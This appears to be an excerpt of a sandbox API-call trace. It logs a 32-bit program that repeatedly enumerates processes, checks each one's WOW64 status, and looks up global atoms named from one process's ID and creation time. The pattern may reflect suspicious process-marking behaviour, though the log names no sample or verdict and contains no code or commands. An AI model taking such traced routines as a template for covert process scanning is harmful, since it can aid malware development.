	[0107.511] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.511] CloseHandle (hObject=0x694) returned 1
	[0107.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.511] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.511] CloseHandle (hObject=0x694) returned 1
	[0107.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.511] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.511] CloseHandle (hObject=0x694) returned 1
	[0107.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.512] CloseHandle (hObject=0x694) returned 1
	[0107.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.512] CloseHandle (hObject=0x694) returned 1
	[0107.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.512] CloseHandle (hObject=0x694) returned 1
	[0107.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.512] CloseHandle (hObject=0x694) returned 1
	[0107.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.513] CloseHandle (hObject=0x694) returned 1
	[0107.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.513] CloseHandle (hObject=0x694) returned 1
	[0107.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.513] CloseHandle (hObject=0x694) returned 1
	[0107.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.514] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.514] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.514] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.514] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.515] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.515] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.515] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.515] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.515] CloseHandle (hObject=0x694) returned 1
	[0107.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.516] CloseHandle (hObject=0x694) returned 1
	[0107.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.516] CloseHandle (hObject=0x694) returned 1
	[0107.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.516] CloseHandle (hObject=0x694) returned 1
	[0107.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.555] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.555] CloseHandle (hObject=0x694) returned 1
	[0107.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.555] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.555] CloseHandle (hObject=0x694) returned 1
	[0107.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.556] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.556] CloseHandle (hObject=0x694) returned 1
	[0107.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.556] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.556] CloseHandle (hObject=0x694) returned 1
	[0107.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.556] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.556] CloseHandle (hObject=0x694) returned 1
	[0107.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.556] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.556] CloseHandle (hObject=0x694) returned 1
	[0107.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.556] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.557] CloseHandle (hObject=0x694) returned 1
	[0107.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.557] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.557] CloseHandle (hObject=0x694) returned 1
	[0107.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.557] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.557] CloseHandle (hObject=0x694) returned 1
	[0107.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.557] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.557] CloseHandle (hObject=0x694) returned 1
	[0107.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.557] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.558] CloseHandle (hObject=0x694) returned 1
	[0107.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.558] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.558] CloseHandle (hObject=0x694) returned 1
	[0107.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.558] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.558] CloseHandle (hObject=0x694) returned 1
	[0107.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.558] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.558] CloseHandle (hObject=0x694) returned 1
	[0107.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.558] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.558] CloseHandle (hObject=0x694) returned 1
	[0107.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.559] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.559] CloseHandle (hObject=0x694) returned 1
	[0107.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.559] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.559] CloseHandle (hObject=0x694) returned 1
	[0107.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.559] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.559] CloseHandle (hObject=0x694) returned 1
	[0107.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.559] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.559] CloseHandle (hObject=0x694) returned 1
	[0107.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.559] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.559] CloseHandle (hObject=0x694) returned 1
	[0107.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.560] CloseHandle (hObject=0x694) returned 1
	[0107.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.560] CloseHandle (hObject=0x694) returned 1
	[0107.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.560] CloseHandle (hObject=0x694) returned 1
	[0107.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.560] CloseHandle (hObject=0x694) returned 1
	[0107.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.560] CloseHandle (hObject=0x694) returned 1
	[0107.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.561] CloseHandle (hObject=0x694) returned 1
	[0107.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.561] CloseHandle (hObject=0x694) returned 1
	[0107.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.561] CloseHandle (hObject=0x694) returned 1
	[0107.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.561] CloseHandle (hObject=0x694) returned 1
	[0107.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.561] CloseHandle (hObject=0x694) returned 1
	[0107.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.561] CloseHandle (hObject=0x694) returned 1
	[0107.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.562] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.562] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.562] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.563] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.563] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.563] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.563] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.563] CloseHandle (hObject=0x694) returned 1
	[0107.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.563] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.563] CloseHandle (hObject=0x694) returned 1
	[0107.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.564] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.564] CloseHandle (hObject=0x694) returned 1
	[0107.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.564] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.564] CloseHandle (hObject=0x694) returned 1
	[0107.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.632] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.633] CloseHandle (hObject=0x694) returned 1
	[0107.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.633] CloseHandle (hObject=0x694) returned 1
	[0107.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.633] CloseHandle (hObject=0x694) returned 1
	[0107.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.634] CloseHandle (hObject=0x694) returned 1
	[0107.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.634] CloseHandle (hObject=0x694) returned 1
	[0107.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.634] CloseHandle (hObject=0x694) returned 1
	[0107.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.634] CloseHandle (hObject=0x694) returned 1
	[0107.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.634] CloseHandle (hObject=0x694) returned 1
	[0107.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.635] CloseHandle (hObject=0x694) returned 1
	[0107.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.635] CloseHandle (hObject=0x694) returned 1
	[0107.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.635] CloseHandle (hObject=0x694) returned 1
	[0107.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.635] CloseHandle (hObject=0x694) returned 1
	[0107.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.636] CloseHandle (hObject=0x694) returned 1
	[0107.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.636] CloseHandle (hObject=0x694) returned 1
	[0107.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.636] CloseHandle (hObject=0x694) returned 1
	[0107.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.636] CloseHandle (hObject=0x694) returned 1
	[0107.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.636] CloseHandle (hObject=0x694) returned 1
	[0107.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.637] CloseHandle (hObject=0x694) returned 1
	[0107.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.637] CloseHandle (hObject=0x694) returned 1
	[0107.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.637] CloseHandle (hObject=0x694) returned 1
	[0107.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.637] CloseHandle (hObject=0x694) returned 1
	[0107.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.637] CloseHandle (hObject=0x694) returned 1
	[0107.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.638] CloseHandle (hObject=0x694) returned 1
	[0107.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.638] CloseHandle (hObject=0x694) returned 1
	[0107.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.638] CloseHandle (hObject=0x694) returned 1
	[0107.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.638] CloseHandle (hObject=0x694) returned 1
	[0107.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.638] CloseHandle (hObject=0x694) returned 1
	[0107.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.639] CloseHandle (hObject=0x694) returned 1
	[0107.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
